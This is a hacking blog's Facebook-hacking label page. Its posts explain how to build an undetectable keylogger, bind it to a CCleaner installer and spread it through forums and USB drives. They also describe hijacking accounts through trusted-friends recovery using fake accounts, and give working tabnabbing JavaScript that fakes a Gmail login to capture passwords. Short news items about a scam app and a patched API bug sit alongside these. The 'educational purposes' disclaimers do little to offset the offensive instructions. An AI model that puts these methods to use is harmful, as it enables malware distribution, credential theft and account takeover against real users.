-->
Showing posts with label facebook hacking. Show all posts

0 comments

Hello friends today i will explain you how to hack the Facebook password or accounts remotely using keylogger. Its a 100% working hack and you can easily hack anyone’s Facebook account or password using this hack. In this tutorial I will explain you how to hack Facebook and other passwords of any user using 100% FUD keylogger. The keylogger in this tutorial we will discuss is L33ts keylogger adn its 100% FUD(fully undetectable).

Hacking Facebook account is very easy and just requires not more than 10 minutes of work. Don’t worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.


NOTE: This tutorial is for Educational purposes only i.e. to make you aware how hackers hack your Facebook accounts. Please don’t misuse it. I and Isoftdl is not responsible for any damage caused by you.
 So guys lets start hacking Facebook account or passwords….
Steps to hack Facebook account using Keylogger:
1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.


Step 1. Creating the Keylogger Server
1. Download the keylogger.


2. Extract the file, Now you will get two folders:
a. First one contains Keylogger and Binder
b. Second Contains resource hacker tool.( to extract the icons from installers).

3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it’s details in this.


4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.


Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger to Ccleaner setup file. So open the Ccleaner setup with resource hacker. 
3. Now in menu there is one action button click on it and then click save all resources.

4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).


Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it’s Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.


5. Now again go to File’s menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the victim that is your friend.


Step4 : How to Spread Keylogger or send it to victim or friend
1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software’s to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it. 
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn’t that so easy to hack anyone’s Facebook account in just few minutes. 
How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don’t use cracked softwares and don’t download them from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.

I hope you all have liked it. If you have any queries ask me.  Please comment if you like my posts. Thanks for reading….
author-pic About author
hiiii......, this is ajay, a chemical engineer by profession, a tech geek by passion, enjoys ethical hacking




Read More »

0 comments
FacebookBlack
Scammers have again targeted more than onebillion active users of the popular social networking giant Facebook, to infect as many victims as possible.
This time, an old Facebook scam is back in action once again!
Malicious Facebook “Color Changer” app has resurfaced again on the popular social networking site Facebook, this time compromising more than 10,000 people worldwide.
The malicious app promises users to change the characteristic blue colour of Facebook’s header and interface to one of nine other colours including pink, purple, green, yellow, orange and black, in order to infect users’ phones and computers with malicious software.

Researchers at China-based Internet company Cheetah Mobile have detected the “Facebook colour changer” that tricks Facebook users into downloading the app via a malicious phishing site.
The phishing website targets users in two ways:
  • First of all, it steals the users’ Facebook Access Tokens by asking them to view a color changer tutorial video,which allows hacker to connect to the victim’s Facebook friends.
  • If the user doesn’t watch the video, the site then tries to get them to download the malicious color changer application, in order to infect their systems with malware.
However, PC users are lead to a bogus site to download a pornographic video player, and Android device users are issued a warning saying their device has been infected and advised to download a suggested application.
According to the researchers at Cheetah Mobile, the problem stems from “a vulnerability that lives in Facebook’s app page itself, allowing hackers to implant viruses and malicious code into Facebook-based applications that directs users to phishing sites.
The new color changer app has affected Facebook users in several countries but this is not the very first time it has happened before, according to Cheetah Mobile’s security researchers.
Facebook has become Number 1 social networking website with more than one billion active users this year. Hundreds of people join the social networking website everyday. On the other hand, with the increase in popularity, Facebook also serves as a great and useful platform for scammers and falling victim to such scams is very simple.
So here’s what you can do in order to protect yourself from this threat. Follow these steps:
  • Realize there’s no way to customize your Facebook with an app
  • Do not click any link which suggests otherwise
  • Even if the link suggests it’s heading toward an Official Facebook Page - DO NOT TRUST IT
But, for those who have already installed the app should uninstall the app straight away and change their Facebook account password. To prevent further problems we suggest you to completely turn offFacebook’s apps platform, and install a trusted security application to your devices.
Remember, there is absolutely no friendly way to change the color of your Facebook. You can only customize your Facebook account or page by adding any of your other profile photo and a different header image through your normal Facebook settings – That’s it!

Read More »

0 comments
Stephen Sclafani , a Security Researcher, has discovered a critical security vulnerability in the Social Networking giant Facebook that allowed him to hack any facebook accounts.

Stephen just need your user ID, he can hack into your account and read private messages, view email addresses, create or delete notes, on top of that he can update status and upload photos and tag you friends,  on behalf you. 

"A misconfigured endpoint allowed legacy REST API calls to be made on behalf of any Facebook user using only their user ID" Stephen explained in his blog.

The Facebook REST API is said to be predecessor of Facebook’s current Graph API.  He managed to send request to server using this API such that it will update status on behalf of victim.


Stephen found this bug in April 23 and reported to Facebook.  After getting notification, Facebook permanently fixed the bug on April 30th. Facebook awarded $20,000 bounty to him for finding and reporting this bug.

Read More »

0 comments

Yes you can use Two Different Profile Pictures on Facebook, Anxious to know how ? Stay with me and i will show you.
The Bug Was Originally Founded by Khalil (Security Researcher)
UPDATE: The Bug Seems to be Fixed
Here in this Facebook Trick i will show you how to Use Two Different Profile Pictures on Facebook, Check out the Below Picture to get more Idea.
Use Two Different Profile Pictures on Facebook
In the Above Picture You will notice that The Profile picture on my timeline and the Profile Picture in my Status are Different. Let us See how it is done.

Steps to Use Two Different Profile Pictures on Facebook


Step 1: First you have to Open your Timeline and Open your Profile Picture Album by clicking on Photos Tab, Choose a Picture that you want as another Profile Picture.
Step 2: Open that Picture in a New Window By Holding Ctrl and Clicking on it.
Step 3: Now Check the URL of that Picture, you will get something like below URL
https://www.facebook.com/photo.php?fbid=491366447588908&set=a.108695719189318.5863.100001466701828&type
All you have to do is Copy the fbid, Here in the above url, my photo fbid is 491366447588908.
Step 4: Open your Timeline, hover your mouse on your Profile Picture, you will see  Edit Profile Picture Option,Click on it and Select Edit Thumbnail.
Step 5: A popup window will appear, now Right Click on your Profile Picture and Choose Inspect Element,
Use Two Pofile Pictures on Facebook
Scroll down till you find <form action=”https://upload.facebook.com/save_square_pic.php”
Step 6: Now click on the Small arrow to Expand the Code Further.
Use Two Profile pictures on Facebook
Scroll down a bit, you will find <input type=”hidden” autocomplete=”off” name=”photo_fbid” value=”491366447588908“>
Now all You need to do is Replace the Current fbid Value with the one you Copied earlier in Step 3,You can do it by Double Clicking on the Current fbid Value and Replace it with the one you Copied earlier which is in my case :491366447588908.
Step 7: Click anywhere , Close Inspect Element Window and Now Click on Save, All Done, Now Check your timeline, update any status and you will see Different Profile Picture.
Step 8: Liked it? Learned Something new ? Then its time to Let your Friends Know about it. Have Fun!!!

Read More »

0 comments


Step wise method to hack Facebook account:

  • Create 3 Facebook Accounts: First of all create three new Facebook accounts with any name. (Use such names that your target like to add them in his/her friend list)
  • Add them to your Target's friend list: Anyhow add that three friends in the friend list of your target. This is the main work of this trick, and if you get success in doing this then you are almost done.
  • Forget Password: Now open Facebook and click on 'forget your password' option.
  • Email and Full Name: After the above step, you will get a window which will ask you the email and full name of the target, fill them respectively. (This will be first recovery option in that window, leave other 2 blanks and click on the submit (search) button at the bottom right corner of that window. After successful filling these 2 details you will see the profile picture of your target.
  • Reset your password: Now you will get a reset your password window, in which select 'No longer have access to these' option and then click on the RESET PASSWORD option.
  • New email address: Now you will get a new window in which Facebook will ask you to new source to contact you. There provide a new email address which should not be associated with any already existing Facebook account.
  • Security question check: After the above step you will get a security question check window. If you know the answer of that security question then you can fill it there and its done. But if you do not know the answer of security question then fill it wrong 3 times. After which you will be proceeded to next step i.e trusted friends feature. Where any account is recovered via their friends.
  • Trusted friend check up: Now you will be in the window of trusted friends check up where you have to select those 3 accounts that you created and add in target accounts friend list and click on continue each time there.
  • Security code: You have done ! Now Facebook will send security codes to the email addresses associated with those 3 Facebook accounts created by you to hack target's account. Now open each email one by one and fill their respective security codes to the Facebook security code box of respective 3 Facebook accounts. (Note: Check spam folder of your email boxes if you do not found security codes in inbox of your emails)
  • Reset password link: Now you will get password reset link to the email that you provided to Facebook as a source of contact to you. Click on that link and reset password of target's account to new one.
Now, you have hacked Facebook account of target. But never try this without any ethical purpose. Because it is crime to hack any account on internet. But I share this method here just for noble cause that how you can save your Facebook account from being hacked by this method. This method was necessary to discuss to make you learn what steps you need to take to keep your account safe from hackers

Read More »

0 comments
Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular Web sites by impersonating those sites and convincing the user that the site is genuine. The attack's name was coined in early 2010 by Aza Raskin, a security researcher and design expert.






  • How Tabnabbing Works ?

1. A user navigates to your normal looking site.

2. You detect when the page has lost its focus and hasn’t been interacted with for a while.

3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.

4. As the user scans their many open tabs, the favicon and title act as a strong visual cue - memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.

5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.






You can make this attack even more effective by changing the copy: Instead of having just a login screen, you can mention that the session has timed out and the user needs to re-authenticate. This happens often on bank websites, which makes them even more susceptible to this kind of attack.




  • Source Code:
(function(){

var TIMER = null;
var HAS_SWITCHED = false;

window.onblur = function(){
TIMER = setTimeout(changeItUp, 5000);
}

window.onfocus = function(){
if(TIMER) clearTimeout(TIMER);
}

function setTitle(text){ document.title = text; }

favicon = {
docHead: document.getElementsByTagName("head")[0],
set: function(url){
this.addLink(url);
},

addLink: function(iconURL) {
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = iconURL;
this.removeLinkIfExists();
this.docHead.appendChild(link);
},

removeLinkIfExists: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
this.docHead.removeChild(link);
return;
}
}
},

get: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
return link.href;
}
}
}
};


function createShield(){
div = document.createElement("div");
div.style.position = "fixed";
div.style.top = 0;
div.style.left = 0;
div.style.backgroundColor = "white";
div.style.width = "100%";
div.style.height = "100%";
div.style.textAlign = "center";
document.body.style.overflow = "hidden";

img = document.createElement("img");
img.style.paddingTop = "15px";
img.src = "http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png";

var oldTitle = document.title;
var oldFavicon = favicon.get() || "/favicon.ico";

div.appendChild(img);
document.body.appendChild(div);
img.onclick = function(){
div.parentNode.removeChild(div);
document.body.style.overflow = "auto";
setTitle(oldTitle);
favicon.set(oldFavicon)
}


}

function changeItUp(){
if( HAS_SWITCHED == false ){
createShield("https://mail.google.com");
setTitle( "Gmail: Email from Google");
favicon.set("https://mail.google.com/favicon.ico");
HAS_SWITCHED = true;
}
}


})();


  • Protection:

1. Keep your web browser up-to-date. Also make sure that plugins and extensions are up-to-date and from trusted sources.

2. The NoScript extension for Firefox defends both from the JavaScript-based and from the scriptless attack, based on meta refresh, by preventing inactive tabs from changing the location of the page.

3. Pay attention to the address in your browser’s toolbar, especially when it comes to login pages. It’s easy to get into muscle-memory mode and just assume that a tab is unchanged, but for important user accounts, keep an eye on that location bar.

4. Consider using some sort of password management tool. Raskin points to the Firefox Account Manager as one method of using the browser for your identity manager, but plugins and tools like1Password are good choices too. Rather than typing in user names and passwords individually, using an identity manager that compares the site you are on against the stored data in its database (making sure the addresses and DNS addresses matchup) will prevent you from entering in information into a false site.





Happy Hacking...Enjoy...

Read More »